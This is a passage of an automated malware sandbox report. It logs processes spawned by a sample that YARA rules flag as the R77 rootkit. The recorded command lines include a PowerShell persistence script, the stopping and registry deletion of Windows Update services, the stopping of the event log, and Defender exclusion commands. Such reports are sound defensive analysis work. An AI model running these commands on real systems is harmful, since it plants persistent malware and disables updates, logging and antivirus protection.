Start date:	02/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Imagebase:	0x7ff679ad0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	03:58:06
Start date:	02/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell <#tkmebyokj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'Barac' /tr '''C:\Program Files\Cuis\bon\Bara.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Cuis\bon\Bara.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Barac' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Barac" /t REG_SZ /f /d 'C:\Program Files\Cuis\bon\Bara.exe' }
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	03:58:06
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	03:58:06
Start date:	02/01/2025
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe stop UsoSvc
Imagebase:	0x7ff784da0000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	03:58:06
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	03:58:06
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	03:58:06
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	03:58:06
Start date:	02/01/2025
Path:	C:\Windows\System32\wusa.exe
Wow64 process (32bit):	false
Commandline:	wusa /uninstall /kb:890830 /quiet /norestart
Imagebase:	0x7ff61f8e0000
File size:	345'088 bytes
MD5 hash:	FBDA2B8987895780375FE0E6254F6198
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	03:58:06
Start date:	02/01/2025
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	powercfg /x -hibernate-timeout-ac 0
Imagebase:	0x7ff68dd40000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	03:58:06
Start date:	02/01/2025
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop UsoSvc
Imagebase:	0x7ff784da0000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	03:58:07
Start date:	02/01/2025
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe stop WaaSMedicSvc
Imagebase:	0x7ff784da0000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	03:58:07
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	03:58:07
Start date:	02/01/2025
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	powercfg /x -hibernate-timeout-dc 0
Imagebase:	0x7ff68dd40000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	03:58:07
Start date:	02/01/2025
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop WaaSMedicSvc
Imagebase:	0x7ff784da0000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	03:58:07
Start date:	02/01/2025
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	powercfg /x -standby-timeout-ac 0
Imagebase:	0x7ff68dd40000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	03:58:07
Start date:	02/01/2025
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe stop wuauserv
Imagebase:	0x7ff784da0000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	03:58:07
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	03:58:07
Start date:	02/01/2025
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	powercfg /x -standby-timeout-dc 0
Imagebase:	0x7ff68dd40000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	03:58:07
Start date:	02/01/2025
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop wuauserv
Imagebase:	0x7ff784da0000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	03:58:07
Start date:	02/01/2025
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe stop bits
Imagebase:	0x7ff784da0000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	03:58:07
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	03:58:07
Start date:	02/01/2025
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop bits
Imagebase:	0x7ff784da0000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	03:58:07
Start date:	02/01/2025
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop dosvc
Imagebase:	0x7ff784da0000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	03:58:08
Start date:	02/01/2025
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe stop dosvc
Imagebase:	0x7ff784da0000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	03:58:08
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	03:58:08
Start date:	02/01/2025
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
Imagebase:	0x7ff7e9980000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	03:58:08
Start date:	02/01/2025
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Imagebase:	0x7ff68dd40000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	03:58:08
Start date:	02/01/2025
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Imagebase:	0x7ff68dd40000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	03:58:08
Start date:	02/01/2025
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Imagebase:	0x7ff68dd40000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	03:58:08
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	03:58:08
Start date:	02/01/2025
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Imagebase:	0x7ff68dd40000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	49
Start time:	03:58:08
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	50
Start time:	03:58:08
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	51
Start time:	03:58:08
Start date:	02/01/2025
Path:	C:\Windows\System32\dialer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\dialer.exe
Imagebase:	0x7ff7f0120000
File size:	39'936 bytes
MD5 hash:	B2626BDCF079C6516FC016AC5646DF93
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	52
Start time:	03:58:08
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	53
Start time:	03:58:08
Start date:	02/01/2025
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe delete "WAGDKRVZ"
Imagebase:	0x7ff784da0000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	54
Start time:	03:58:08
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	55
Start time:	03:58:08
Start date:	02/01/2025
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
Imagebase:	0x7ff7e9980000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	56
Start time:	03:58:08
Start date:	02/01/2025
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe create "WAGDKRVZ" binpath= "C:\ProgramData\mxergolzfguk\kaptsegthwf.exe" start= "auto"
Imagebase:	0x7ff784da0000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	57
Start time:	03:58:08
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	58
Start time:	03:58:08
Start date:	02/01/2025
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
Imagebase:	0x7ff7e9980000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	59
Start time:	03:58:09
Start date:	02/01/2025
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
Imagebase:	0x7ff7e9980000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	60
Start time:	03:58:09
Start date:	02/01/2025
Path:	C:\Windows\System32\winlogon.exe
Wow64 process (32bit):	false
Commandline:	winlogon.exe
Imagebase:	0x7ff7cd660000
File size:	906'240 bytes
MD5 hash:	F8B41A1B3E569E7E6F990567F21DCE97
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	61
Start time:	03:58:09
Start date:	02/01/2025
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe stop eventlog
Imagebase:	0x7ff784da0000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	62
Start time:	03:58:09
Start date:	02/01/2025
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
Imagebase:	0x7ff7e9980000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	63
Start time:	03:58:09
Start date:	02/01/2025
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe start "WAGDKRVZ"
Imagebase:	0x7ff784da0000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_R77RootKit, Description: Yara detected R77 RootKit, Source: 0000003F.00000002.2041864998.0000017CD5AF0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Rootkit_R77_5bab748b, Description: unknown, Source: 0000003F.00000002.2041864998.0000017CD5AF0000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_R77RootKit, Description: Yara detected R77 RootKit, Source: 0000003F.00000002.2042008011.0000017CD5B20000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Rootkit_R77_5bab748b, Description: unknown, Source: 0000003F.00000002.2042008011.0000017CD5B20000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Has exited:	true

Show Windows behavior

Target ID:	64
Start time:	03:58:09
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	65
Start time:	03:58:09
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	66
Start time:	03:58:09
Start date:	02/01/2025
Path:	C:\ProgramData\mxergolzfguk\kaptsegthwf.exe
Wow64 process (32bit):	false
Commandline:	C:\ProgramData\mxergolzfguk\kaptsegthwf.exe
Imagebase:	0x7ff62dc40000
File size:	2'874'368 bytes
MD5 hash:	952F360A4651F948BE3A673178631641
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_R77RootKit, Description: Yara detected R77 RootKit, Source: 00000042.00000002.2031055228.0000023E07F70000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Rootkit_R77_5bab748b, Description: unknown, Source: 00000042.00000002.2031055228.0000023E07F70000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_R77RootKit, Description: Yara detected R77 RootKit, Source: 00000042.00000002.2031091638.0000023E07FA0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Rootkit_R77_5bab748b, Description: unknown, Source: 00000042.00000002.2031091638.0000023E07FA0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 92%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	67
Start time:	03:58:09
Start date:	02/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7340, Parent PID: 7376

General

Target ID:	68
Start time:	03:58:09
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_R77RootKit, Description: Yara detected R77 RootKit, Source: 00000044.00000002.2033261460.000001A646D10000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Rootkit_R77_5bab748b, Description: unknown, Source: 00000044.00000002.2033261460.000001A646D10000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_R77RootKit, Description: Yara detected R77 RootKit, Source: 00000044.00000002.2033301105.000001A646D40000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Rootkit_R77_5bab748b, Description: unknown, Source: 00000044.00000002.2033301105.000001A646D40000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	11.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	30.5%
Total number of Nodes:	2000
Total number of Limit Nodes:	27

Executed Functions

Function 00007FF731C9B110 Relevance: 123.9, APIs: 60, Strings: 10, Instructions: 1421windowfilesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF731C7255C: GetDlgItem.USER32 ref: 00007FF731C725AC
Part of subcall function 00007FF731C7255C: SetWindowTextW.USER32 ref: 00007FF731C725C8

EndDialog.USER32 ref: 00007FF731C9B250
SetDlgItemTextW.USER32 ref: 00007FF731C9B2A0
GetMessageW.USER32 ref: 00007FF731C9B2D0
IsDialogMessageW.USER32 ref: 00007FF731C9B2E9
TranslateMessage.USER32 ref: 00007FF731C9B2FB
DispatchMessageW.USER32 ref: 00007FF731C9B309
EndDialog.USER32 ref: 00007FF731C9B353
GetDlgItem.USER32 ref: 00007FF731C9B390
SendMessageW.USER32 ref: 00007FF731C9B3B1
SendMessageW.USER32 ref: 00007FF731C9B3C9
SetFocus.USER32 ref: 00007FF731C9B3D2
GetLastError.KERNEL32 ref: 00007FF731C9B5B4
GetLastError.KERNEL32 ref: 00007FF731C9B5E5
GetTickCount.KERNEL32 ref: 00007FF731C9B60B
GetLastError.KERNEL32 ref: 00007FF731C9B675
GetCommandLineW.KERNEL32 ref: 00007FF731C9B7C1
CreateFileMappingW.KERNEL32 ref: 00007FF731C9B880
MapViewOfFile.KERNEL32 ref: 00007FF731C9B8A3
ShellExecuteExW.SHELL32 ref: 00007FF731C9B8DB
Sleep.KERNEL32 ref: 00007FF731C9B936
UnmapViewOfFile.KERNEL32 ref: 00007FF731C9B95F
CloseHandle.KERNEL32 ref: 00007FF731C9B968
SetDlgItemTextW.USER32 ref: 00007FF731C9BC5E
SendMessageW.USER32 ref: 00007FF731C9BE43
SendDlgItemMessageW.USER32 ref: 00007FF731C9BE6A
GetDlgItem.USER32 ref: 00007FF731C9BE78
SendMessageW.USER32 ref: 00007FF731C9BE92
GetDlgItem.USER32 ref: 00007FF731C9BECF
SetDlgItemTextW.USER32 ref: 00007FF731C9BF6C
SetDlgItemTextW.USER32 ref: 00007FF731C9BF84
DialogBoxParamW.USER32 ref: 00007FF731C9C057
EndDialog.USER32 ref: 00007FF731C9C06F
EnableWindow.USER32 ref: 00007FF731C9C226
SendMessageW.USER32 ref: 00007FF731C9C278
SetDlgItemTextW.USER32 ref: 00007FF731C9C2A1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C9C2E3
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C9C2E9
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C9C2EF
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C9C2F5
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C9C2FB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C9C301
SendDlgItemMessageW.USER32 ref: 00007FF731C9C3C9
EndDialog.USER32 ref: 00007FF731C9C3E3
GetDlgItem.USER32 ref: 00007FF731C9C411
SetFocus.USER32 ref: 00007FF731C9C41A
SendDlgItemMessageW.USER32 ref: 00007FF731C9C4BE
FindFirstFileW.KERNEL32 ref: 00007FF731C9C4E2
FindClose.KERNEL32 ref: 00007FF731C9C60A
SendDlgItemMessageW.USER32 ref: 00007FF731C9C72F

Part of subcall function 00007FF731C7129C: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF731C71396

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C9CA29
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C9CA2F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C9CA35
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C9CA3B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C9CA41
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C9CA47

Strings

p, xrefs: 00007FF731C9B72B
STARTDLG, xrefs: 00007FF731C9B14A
winrarsfxmappingfile.tmp, xrefs: 00007FF731C9B860
%s %s, xrefs: 00007FF731C9C659, 00007FF731C9C8C6
LICENSEDLG, xrefs: 00007FF731C9C049
__tmp_rar_sfx_access_check_, xrefs: 00007FF731C9B629
@, xrefs: 00007FF731C9B736
REPLACEFILEDLG, xrefs: 00007FF731C9C353
